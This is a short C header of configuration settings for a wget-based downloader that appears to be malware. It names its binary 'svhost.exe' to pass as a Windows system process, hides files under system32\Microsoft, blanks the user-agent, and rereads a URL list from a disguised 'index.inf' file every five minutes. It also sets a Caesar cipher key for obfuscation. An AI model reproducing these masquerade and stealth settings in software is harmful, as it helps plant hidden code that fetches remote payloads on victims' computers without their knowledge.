// $Id$

// you can specify following parameters:

	// path to directory relative to system32 path (don't forget first slash!)
#define conf_wget_dir ""

	// just name without any slashes
#define conf_wget_filename "svhost.exe"

	// just name without any delimiters
#define conf_wget_logfile "win-js-ff_32.log"

	// path to directory (relative to system32 path) to store downloaded files (don't use double quotes and don't forget first slash!)
#define conf_wget_dir_prefix "\\Microsoft"

	// additional args without any spaces at begin or end
#define conf_wget_args "-U \"\""

	// period of rereading URLs file, in seconds
#define conf_urls_time	5*60					

	// full path to file to read URLs from
#define conf_urls_path "C:\\Documents and Settings\\stud\\Application Data\\Microsoft\\index.inf"

	// caesar cypher key
#define conf_caesar_key 239
